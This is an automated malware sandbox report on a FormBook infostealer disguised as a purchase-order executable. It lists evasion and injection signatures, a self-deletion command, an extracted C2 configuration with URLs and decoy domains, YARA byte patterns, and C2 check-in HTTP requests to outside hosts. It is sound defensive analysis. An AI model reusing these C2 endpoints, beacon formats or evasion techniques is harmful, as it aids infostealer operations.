Windows Analysis Report PO 56720012359.exe

Overview

General Information

Sample Name: PO 56720012359.exe
Analysis ID: 483537
MD5: 839c75a88734aaf014ef0c3d77ce9109
SHA1: 10d79cb8e51fd30bfff63b2465ba0e111f6dd500
SHA256: 1829af596150521350d812c07f81226755d397e4755f649e083cc06de7d6f402
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • PO 56720012359.exe (PID: 2600 cmdline: 'C:\Users\user\Desktop\PO 56720012359.exe' MD5: 839C75A88734AAF014EF0C3D77CE9109)
    • conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • PO 56720012359.exe (PID: 1392 cmdline: 'C:\Users\user\Desktop\PO 56720012359.exe' MD5: 839C75A88734AAF014EF0C3D77CE9109)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 6300 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6324 cmdline: /c del 'C:\Users\user\Desktop\PO 56720012359.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.allfyllofficial.com/b6cu/"], "decoy": ["sxdiyan.com", "web0084.com", "cpafirmspokane.com", "la-bio-geo.com", "chacrit.com", "stuntfighting.com", "rjsworkshop.com", "themillennialsfinest.com", "thefrontrealestate.com", "chairmn.com", "best1korea.com", "gudssutu.icu", "backupchip.net", "shrikanthamimports.com", "sportrecoverysleeve.com", "healthy-shack.com", "investperwear.com", "intertradeperu.com", "resonantonshop.com", "greghugheslaw.com", "instrumentum.store", "creative-cloud.info", "sansfoundations.com", "pmca.asia", "night.doctor", "19v5.com", "cmas.life", "yhanlikho.com", "kartikpatelrealtor.com", "viralpagi.com", "samsonengineeringco.com", "mh666.cool", "laboratoriosjj.com", "produklokal.com", "tjhysb.com", "solutions-oigroup.com", "chictarh.com", "gotmail.info", "yourvalue.online", "mylinkreview.com", "champonpowerequipment.com", "starcoupeownersindonesia.com", "buzagialtligi.com", "botol2-lasdnk.com", "blunss.info", "l3-construction.com", "fmodesign.com", "silkraga.com", "editimpact.com", "unionairjordanla.com", "lacageavin.com", "gushixiu.com", "cleanlast.com", "awvpvkmzxa.com", "xiaosandao.com", "nldcostmetics.com", "prosperitywithsoul.com", "kheticulture.com", "booksbykimberlyeandco.com", "creativehughes.com", "mobilewz.com", "arerasols.com", "w-hanaemi-personal.com", "dynamonetwork.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xa83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x66c9:$sqlite3step: 68 34 1C 7B E1
    • 0x67dc:$sqlite3step: 68 34 1C 7B E1
    • 0x66f8:$sqlite3text: 68 38 2A 90 C5
    • 0x681d:$sqlite3text: 68 38 2A 90 C5
    • 0x670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6833:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      1.2.PO 56720012359.exe.2d10000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        1.2.PO 56720012359.exe.2d10000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.PO 56720012359.exe.2d10000.1.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        3.2.PO 56720012359.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          3.2.PO 56720012359.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook (configuration identical to the one listed under Malware Configuration)
          Multi AV Scanner detection for submitted file
          Source: PO 56720012359.exe, Virustotal: Detection: 50%
          Source: PO 56720012359.exe, ReversingLabs: Detection: 40%
          Yara detected FormBook
          Source: Yara match, File source: 1.2.PO 56720012359.exe.2d10000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.PO 56720012359.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.PO 56720012359.exe.2d10000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.PO 56720012359.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000010.00000002.507566355.0000000003540000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000000.275696203.000000000708B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.329627291.00000000015F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.252875789.0000000002D10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000010.00000002.507780736.0000000003570000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: www.allfyllofficial.com/b6cu/, Avira URL Cloud: Label: malware
          Source: 1.2.PO 56720012359.exe.2d10000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.PO 56720012359.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: PO 56720012359.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: PO 56720012359.exe, Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: PO 56720012359.exe, 00000003.00000002.330426042.0000000003350000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO 56720012359.exe, 00000001.00000003.249848116.0000000002D80000.00000004.00000001.sdmp, PO 56720012359.exe, 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, cscript.exe, 00000010.00000003.329208174.0000000005160000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO 56720012359.exe, cscript.exe
          Source: Binary string: cscript.pdb source: PO 56720012359.exe, 00000003.00000002.330426042.0000000003350000.00000040.00020000.sdmp

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 107.180.44.148:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 107.180.44.148:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 107.180.44.148:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49783 -> 50.87.144.47:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49783 -> 50.87.144.47:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49783 -> 50.87.144.47:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Network Connect: 156.252.96.170 80
          Source: C:\Windows\explorer.exe, Domain query: www.fmodesign.com
          Source: C:\Windows\explorer.exe, Domain query: www.healthy-shack.com
          Source: C:\Windows\explorer.exe, Domain query: www.arerasols.com
          Source: C:\Windows\explorer.exe, Network Connect: 154.81.100.18 80
          Source: C:\Windows\explorer.exe, Network Connect: 107.180.44.148 80
          Source: C:\Windows\explorer.exe, Domain query: www.mobilewz.com
          Source: C:\Windows\explorer.exe, Network Connect: 23.252.68.226 80
          Source: C:\Windows\explorer.exe, Domain query: www.stuntfighting.com
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.allfyllofficial.com/b6cu/
          Source: Joe Sandbox View, ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: Joe Sandbox View, ASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: global traffic, HTTP traffic detected: GET /b6cu/?y2=_npT80v0M2&L8fhOFRP=0cNTwCf3GfppWKB0T1XESIgtEFKjNX2tylJLJaVzm8N2XRqnUHRn8w7/tpdMCfw1z2P+ HTTP/1.1; Host: www.stuntfighting.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: GET /b6cu/?L8fhOFRP=v4/7wB6X+ne64BMfzkTnNfrtxR+fNWuSRi8sP9TYFcLz2AIA8KGD8NWIHbMwW3JjWqpf&y2=_npT80v0M2 HTTP/1.1; Host: www.fmodesign.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: GET /b6cu/?y2=_npT80v0M2&L8fhOFRP=PWSncnBGX0y4t94MIYhADTl/ZWH8Ec5DThT4C2sI40tRDeDzLuqQGdQiyNRL5TLkWfMz HTTP/1.1; Host: www.healthy-shack.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Wed, 15 Sep 2021 06:36:29 GMT; Content-Type: text/html; Content-Length: 146; Connection: close; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmp, String found in binary or memory: http://findquickresultsnow.com/High_Speed_Internet.cfm?domain=allfyllofficial.com&fp=CDQ1BUiKVEwbYLN
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmp, String found in binary or memory: http://findquickresultsnow.com/Parental_Control.cfm?domain=allfyllofficial.com&fp=CDQ1BUiKVEwbYLNmNk
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmp, String found in binary or memory: http://findquickresultsnow.com/display.cfm
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmp, String found in binary or memory: http://findquickresultsnow.com/px.js?ch=1
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmp, String found in binary or memory: http://findquickresultsnow.com/px.js?ch=2
          Source: cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmp, String found in binary or memory: http://findquickresultsnow.com/sk-logabpstatus.php?a=NXM3Y25kMzZuSzNqUXBxY0xQbmloMGRRSnhhT3VRc1EvRkt
          Source: cscript.exe, 00000010.00000002.508876093.0000000003683000.00000004.00000020.sdmp, String found in binary or memory: http://www.mobilewz.com/
          Source: cscript.exe, 00000010.00000002.508876093.0000000003683000.00000004.00000020.sdmp, String found in binary or memory: http://www.mobilewz.com/user
          Source: cscript.exe, 00000010.00000002.508876093.0000000003683000.00000004.00000020.sdmp, String found in binary or memory: http://www.mobilewz.com/b6cu/?y2=_npT80v0M2&L8fhOFRP=hpZKB5Wc2v3dAucjERLG4WeGvlE/NyvmoCIino6AurWFNcX
          Source: unknown, DNS traffic detected: queries for: www.stuntfighting.com

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 1.2.PO 56720012359.exe.2d10000.1.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PO 56720012359.exe.2d10000.1.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.2.PO 56720012359.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.PO 56720012359.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.PO 56720012359.exe.2d10000.1.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PO 56720012359.exe.2d10000.1.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.2.PO 56720012359.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.PO 56720012359.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.507566355.0000000003540000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.507566355.0000000003540000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.275696203.000000000708B000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.275696203.000000000708B000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.329627291.00000000015F0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.329627291.00000000015F0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.252875789.0000000002D10000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.252875789.0000000002D10000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.507780736.0000000003570000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.507780736.0000000003570000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.PO 56720012359.exe.2d10000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO 56720012359.exe.2d10000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.PO 56720012359.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.PO 56720012359.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO 56720012359.exe.2d10000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO 56720012359.exe.2d10000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.PO 56720012359.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.PO 56720012359.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.507566355.0000000003540000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.507566355.0000000003540000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.275696203.000000000708B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.275696203.000000000708B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.329627291.00000000015F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.329627291.00000000015F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.252875789.0000000002D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.252875789.0000000002D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
